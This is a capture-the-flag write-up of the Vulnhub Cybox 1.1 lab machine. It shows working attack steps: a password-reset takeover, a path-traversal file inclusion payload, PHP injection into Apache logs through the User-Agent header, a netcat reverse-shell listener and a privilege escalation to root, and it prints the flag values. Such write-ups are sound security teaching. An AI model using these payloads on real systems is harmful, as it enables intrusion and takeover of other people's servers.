Vulnhub - Cybox 1.1 write up
6 min read

Vulnhub - Cybox 1.1 write up

Vulnhub - Cybox 1.1 write up

Description

Will you be able to compromise the internal server of the CYBOX company?

Difficulty: Medium
Objective: Get user.txt and root.txt

This works better with VirtualBox rather than VMware.
Contact: @takito1812

Recon

Let's scan our network to find the IP of the box.

$ sudo netdiscover

 Currently scanning: 192.168.30.0/16   |   Screen View: Unique Hosts                                                                
                                                                                                                                    
 5 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 264                                                                    
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------                                                             
 192.168.1.40    08:00:27:e2:7c:c9      1      60  PCS Systemtechnik GmbH                                                           
...

Ports scan :

$ nmap -p -1024 -T4 -oN scan.nmap 192.168.1.40

PORT    STATE SERVICE
21/tcp  open  ftp
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
143/tcp open  imap
443/tcp open  https

There are many open ports, ftp, mail (SMTP & POP3), web (HTTP & HTTPS).

FTP

I try to do an anonymous login on the FTP but it doesn't work.

Web

https://192.168.1.40/index.html

Nothing interesting on this static webpage apart from the admin email that give us a valid username and the domain (cybox.company).

The HTTPS certificate confirms the validity of the admin email address.

/C=US/ST=New York/L=New York City/O=Cybox Company/OU=Cybox/CN=cybox.company/emailAddress=admin@cybox.company

gobuster was running in the background to find some new endpoints.

$ /opt/gobuster dir -w /opt/directory-list-lowercase-2.3-medium.txt -x php,txt,html -t 30 --url 192.168.1.40 -q -o gobuster.dir

/index.html           (Status: 200) [Size: 8514]
/assets               (Status: 301) [Size: 237] [--> https://cybox.company/assets/]
/phpmyadmin           (Status: 403) [Size: 92]

The /phpmyadmin returns :

For security reasons, this URL is only accesible using localhost (127.0.0.1) as the hostname
https://192.168.1.40/phpmyadmin

I try to change my Host HTTP header but it does not work.

$ curl -H "Host: localhost" http://192.168.1.40/phpmyadmin
For security reasons, this URL is only accesible using localhost (127.0.0.1) as the hostname

$ curl -H "Host: 127.0.0.1" http://192.168.1.40/phpmyadmin
For security reasons, this URL is only accesible using localhost (127.0.0.1) as the hostname

So, I try to bruteforce the VHOST, maybe we can find some new web applications.

$ /opt/gobuster vhost -w /opt/directory-list-lowercase-2.3-medium.txt -t 30 --url http://cybox.company -q -o vhost.dir

Found: register.cybox.company (Status: 200) [Size: 1252]
Found: dev.cybox.company (Status: 200) [Size: 209]      
Found: webmail.cybox.company (Status: 302) [Size: 0]    
Found: monitor.cybox.company (Status: 302) [Size: 0]    
Found: ftp.cybox.company (Status: 200) [Size: 5295] 

Add it to the /etc/hosts file.

$ cat /etc/hosts
192.168.1.40 cybox.company register.cybox.company dev.cybox.company webmail.cybox.company monitor.cybox.company ftp.cybox.company
https://webmail.cybox.company
https://dev.cybox.company/phpinfo.php
https://monitor.cybox.company
https://ftp.cybox.company
https://register.cybox.company

Yes, there are many apps ! Let's create a user on the register app.

user: toto

Now, we can log in into the webmail and the monitor app. We have no mail and the monitor has no content. Let's try to reset our password.

Let's check our emails.

Ok now, what if we change the reset link.

.../updatePasswordRequest.php?email=toto@cybox.company
.../updatePasswordRequest.php?email=admin@cybox.company

Yes ! We can reset the admin password on the monitor app ! We now have access to a new admin panel.

https://monitor.cybox.company/admin/

After looking at the source code of the page, we can find this :

<link href="styles.php?style=general" type="text/css" rel="stylesheet">

Maybe we can do a LFI (Local File Inclusion) on the style parameter. After some URL guessing we can find a css file at /admin/styles/general.css.

After some quick try, we can confirm the LFI.

http://monitor.cybox.company/admin/styles.php?style=../../../../../../../../etc/passwd%00

root:x:0:0::/root:/bin/bash
...

So know let's try to load logs file, after some bruteforcing we can find the apache access log from the ftp.cybox.company app at /opt/bitnami/apache2/logs/access_log.
By making HTTP request to the FTP app we can control the content of the access_log file, so we can inject PHP code in it.

$ curl "http://ftp.cybox.company/index.php" -A "<?php echo "toto"; ?>"
-A : User-Agent
Go to http://monitor.cybox.company/admin/styles.php?style=../../../../../../../../opt/bitnami/apache2/logs/access_log%00

...
192.168.1.30 - - [03/Jan/2021:21:55:55 +0100] "GET /index.php HTTP/1.1" 200 5295 "-" "toto"

The PHP code is executed ! After trying to make a reverse shell, the cybox machine can't reach our box, some firewall rules I guess. So, I create a reverse shell on port 80 and it works !

$ nc -lvnp 80
Connection from 192.168.1.32:41542
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
python: /opt/bitnami/common/lib/libz.so.1: no version information available (required by python)
daemon@cybox:/opt/bitnami/apache2/htdocs/monitor/admin$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

User

We have our first shell ! Let's find the user.txt flag !

daemon@cybox:/opt/bitnami/apache2/htdocs/monitor/admin$ cd
bash: cd: HOME not set
daemon@cybox:/opt/bitnami/apache2/htdocs/monitor/admin$ cd /home
daemon@cybox:/home$ ls
admin  cybox  toto
daemon@cybox:/home$ cd cybox
daemon@cybox:/home/cybox$ ls 
user.txt
daemon@cybox:/home/cybox$ cat user.txt
d85da08f1a31ef96fb6d4f608611bca2

Root

We can change our user to toto:toto that we have previously created on the register app (it's not required to root the box).

After some enumeration we can find a weird SUID binary at /opt/registerlauncher. It's an ELF that create the differents user on the box from the register app (like our user toto). It takes one parameter, the name of the user to create.

I try to find some vulnerabilities associate to the ELF but no result.

So, I ask a question to myself, what user can we create to gain privileges ? Remember from the beginning, I create a user toto and his password was toto too. So, I try to run the script with root as parameter, maybe this will replace the root password to root. But I get "user already exists". RIP

After some research, my friend W00dy find that, if you create a user named sudo we can execute all the commands with sudo by providing the password sudo.

toto@cybox:/tmp$ /opt/registerlauncher sudo
sudo@cybox.company has been created successfully. The credentials are sudo:sudo. You should change your default password for security.
toto@cybox:/tmp$ su sudo
Password: sudo

To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

sudo@cybox:/tmp$ sudo -l
[sudo] password for sudo: sudo

Matching Defaults entries for sudo on cybox:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sudo may run the following commands on cybox:
    (ALL : ALL) ALL
sudo@cybox:/tmp$ sudo su
root@cybox:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

We are root !

root@cybox:/tmp# cat /etc/sudoers    
...
# Allow members of group sudo to execute any command
%sudo	ALL=(ALL:ALL) ALL
...
root@cybox:/tmp# cat /root/root.txt
4c0183fdd736e2b8fb3f57ddbfa8ce36

The user sudo was in the /etc/sudoers file.
Root flag !

Enjoying these posts? Subscribe for more